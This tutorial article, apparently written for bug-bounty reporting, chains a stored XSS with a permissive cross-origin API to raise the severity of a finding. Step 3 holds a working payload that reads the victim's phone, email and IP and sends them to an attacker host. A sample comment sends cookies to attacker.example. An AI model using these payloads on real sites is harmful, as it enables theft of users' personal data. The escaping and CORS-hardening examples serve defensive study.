Exploiting XSS Vulnerabilities and Same‑Origin Policy to Upgrade Risk Levels
This article explains how to combine reflected and stored cross‑site scripting attacks with same‑origin policy abuse to turn a low‑severity XSS vulnerability into a high‑severity issue, detailing discovery, exploitation steps, and a JavaScript payload that harvests user data.
Introduction
Security Emergency Response Center (SRC) platforms accept vulnerability reports from outside researchers and pay rewards for them. This article focuses on Cross-Site Scripting (XSS), one of the most common web vulnerabilities and a long-standing OWASP Top 10 entry, and shows how an XSS that would be rated low severity on its own (here a stored one) becomes a high-severity finding once it is chained with a cross-origin API that leaks user data.
What is XSS?
Cross‑Site Scripting allows an attacker to inject malicious HTML/JavaScript into a vulnerable page so that the code runs in the browsers of other users.
1. Reflected XSS
1. The attacker places JavaScript in a URL request parameter and lures the user into clicking it, e.g. http://localhost:8080/test?name=<script>alert("you are under attack!")</script>
2. The user clicks the link; the script travels to the web server as part of the request.
3. The backend neither filters nor encodes the input and echoes the script back into the response page.
4. The browser renders the page and executes the script.
2. Stored XSS
1. The attacker posts a comment containing a malicious script.
2. The comment is stored in the database unchanged.
3. Other users view the thread; the server retrieves the comment and renders it into the page without encoding it.
4. Each victim's browser executes the script.
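The two flows above share one root cause: untrusted input is concatenated into HTML without output encoding. The following is an added example, not code from the original article, that models a page renderer for both the reflected `name` parameter and stored comments, first in the vulnerable form and then hardened with output encoding. All function names are hypothetical and the payloads and comments are constructed sample input.

```javascript
// Added example (not from the original article): a minimal page renderer
// showing why reflected and stored XSS happen, next to the fix for both.
// Function names are hypothetical; the inputs below are constructed samples.

// Vulnerable path: the query parameter and the stored comments are
// concatenated straight into the HTML, exactly as in steps 3 of both flows.
function renderPageVulnerable(name, comments) {
  const items = comments.map((c) => `<li>${c.author}: ${c.body}</li>`).join("");
  return `<h1>Hello ${name}</h1><ul>${items}</ul>`;
}

// HTML-encode the five characters that can break out of a text or attribute context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened path: every untrusted value is encoded at the point of output.
// Filtering on input is not enough; the same comment may later be rendered elsewhere.
function renderPageSafe(name, comments) {
  const items = comments
    .map((c) => `<li>${escapeHtml(c.author)}: ${escapeHtml(c.body)}</li>`)
    .join("");
  return `<h1>Hello ${escapeHtml(name)}</h1><ul>${items}</ul>`;
}

// Check used below: does the rendered HTML still contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample input: the reflected payload from the URL in the text,
// plus one benign and one malicious stored comment.
const reflectedName = '<script>alert("you are under attack!")</script>';
const storedComments = [
  { author: "alice", body: "Nice post" },
  { author: "mallory", body: "<script>new Image().src='//attacker.example/?c='+document.cookie</script>" },
];

// Returns whether each renderer leaves an executable script in the page.
function demo() {
  return {
    vulnerable: containsScriptTag(renderPageVulnerable(reflectedName, storedComments)),
    hardened: containsScriptTag(renderPageSafe(reflectedName, storedComments)),
  };
}

console.log(demo());
```

Run it with `node` and the vulnerable renderer reports a live script tag while the hardened one does not; the encoded text still displays the attacker's string verbatim to the reader, which is the intended behaviour for a comment field.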
Same‑Origin Policy
Same-origin policy (SOP) is a core browser security mechanism: a document or script loaded from one origin (scheme, host and port) may not read responses fetched from a different origin. It underpins the security model of the web. A script can still send a cross-origin request, with the victim's cookies attached if it asks for credentials, but the browser only lets it read the response when the target server opts in through CORS response headers. That opt-in is what the chain below depends on.
Vulnerability Discovery Process
Target: an SRC forum site.
1. One sub-domain contains a page with a stored XSS.
2. Another sub-domain exposes an API that can be called cross-origin and returns the logged-in user's phone number, email address, and IP information.
Vulnerability Details
Step 1: Verify the stored XSS
Example URL: https://act.zzzzzz.cn/index.php?mod=book&action=mobile&id=9
The comment field on this page contains a stored XSS payload.
Step 2: Exploit cross‑origin API to harvest user data
API URL: https://bbs-act.zzzzzzz.cn/index.php?mod=index&action=win_list&limit=1&id=2
Combining the two: the script injected through the stored XSS calls the user-data API from the victim's browser with the victim's cookies attached, reads the JSON response, and forwards the phone number, email address, and IP address to an attacker-controlled server. This only works because the API answers requests from the XSS page's origin with CORS headers that allow that origin and credentials; if it did not, the request would still be sent but the browser would refuse to let the script read the response.
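The same-origin policy section and Step 2 both turn on one browser decision: may a script on the XSS-infected sub-domain read a credentialed response from the API? The following added example, which is not code from the original article or the affected site, models that decision as the browser applies it, puts a reflecting CORS handler (the misconfiguration the chain needs) beside an allowlisted one, and runs the chain against both. All origins, header handlers and function names are hypothetical.

```javascript
// Added example (not from the original article): models the browser-side CORS
// check for a credentialed cross-origin read, a misconfigured API that reflects
// any Origin, and a hardened API with an exact-match allowlist.
// Origins and handler names are hypothetical stand-ins for the redacted site.

// Browser side: can a script running at `pageOrigin` read a response that
// carries these headers when the request was sent with credentials?
// This mirrors the Fetch specification's CORS check for credentialed requests.
function browserAllowsCredentialedRead(pageOrigin, headers) {
  const acao = headers["access-control-allow-origin"];
  const acac = headers["access-control-allow-credentials"];
  if (acao === undefined) return false;   // server never opted in
  if (acao === "*") return false;         // wildcard is invalid with credentials
  if (acao !== pageOrigin) return false;  // must match the requesting origin exactly
  return acac === "true";                 // credentials must be explicitly allowed
}

// Misconfigured API: reflects whatever Origin header it receives.
// Any origin that can run script, including an XSS-infected sub-domain,
// can now read the logged-in user's record.
function corsHeadersReflecting(requestOrigin) {
  return {
    "access-control-allow-origin": requestOrigin,
    "access-control-allow-credentials": "true",
  };
}

// Hardened API: exact-match allowlist; unknown origins get no CORS headers at all.
// Assumption for the example: only the main forum front end legitimately calls this API.
const TRUSTED_ORIGINS = new Set(["https://bbs.example.cn"]);
function corsHeadersAllowlisted(requestOrigin) {
  if (!TRUSTED_ORIGINS.has(requestOrigin)) return {};
  return {
    "access-control-allow-origin": requestOrigin,
    "access-control-allow-credentials": "true",
    "vary": "Origin", // caches must not serve one origin's headers to another
  };
}

// The chain from the write-up: the payload runs on the sub-domain that carries
// the stored XSS (hypothetical origin) and calls the user-data API.
const XSS_PAGE_ORIGIN = "https://act.example.cn";

// Returns true when the injected script would be able to read the API's JSON.
function attackReadsDataWith(serverHandler) {
  const headers = serverHandler(XSS_PAGE_ORIGIN);
  return browserAllowsCredentialedRead(XSS_PAGE_ORIGIN, headers);
}

console.log("reflecting API leaks user data:", attackReadsDataWith(corsHeadersReflecting));
console.log("allowlisted API leaks user data:", attackReadsDataWith(corsHeadersAllowlisted));
```

When testing a target, the quickest confirmation of the reflecting case is to send the API request with a forged Origin header (for example `curl -s -D - -H 'Origin: https://attacker.example' <api-url>`) and check whether the response echoes that origin in Access-Control-Allow-Origin together with Access-Control-Allow-Credentials: true. If it does, any XSS on any origin, not only a sibling sub-domain, can read the authenticated response.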
Step 3: JavaScript payload
// Runs inside the page that carries the stored XSS and calls the user-data API.
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
// The response is readable only because the API's CORS headers allow this origin with credentials.
var aa = JSON.parse(this.responseText);
var u = aa['data']['user'];
console.log(u['phone'] + ',' + u['email']); // debugging output; visible in the victim's console
// Exfiltrate through an image request to the attacker-controlled host (placeholder kept from the original).
// Values are URL-encoded so characters such as '+' or '&' in an address survive the trip.
var s = document.createElement('img');
document.body.appendChild(s);
s.src = '//xxx.xxxxxx.cn?phone=' + encodeURIComponent(u['phone']) + '&email=' + encodeURIComponent(u['email']) + '&clientip=' + encodeURIComponent(u['clientip']);
}
};
xhttp.open("GET", "https://bbs-act.zzzzz.cn/index.php?mod=index&action=win_list&limit=20&id=2", true);
// Attach the victim's session cookies so the API returns the logged-in user's own record.
xhttp.withCredentials = true;
xhttp.send();
Step 4: Verify the effect
When a logged-in user opens the forum page that carries the payload, the attacker's server receives that user's phone number, email address, and IP address. A stored XSS that would normally be rated low on its own has become a high-severity leak of personal data.
Submit the vulnerability to the SRC platform and claim the reward.
IT Services Circle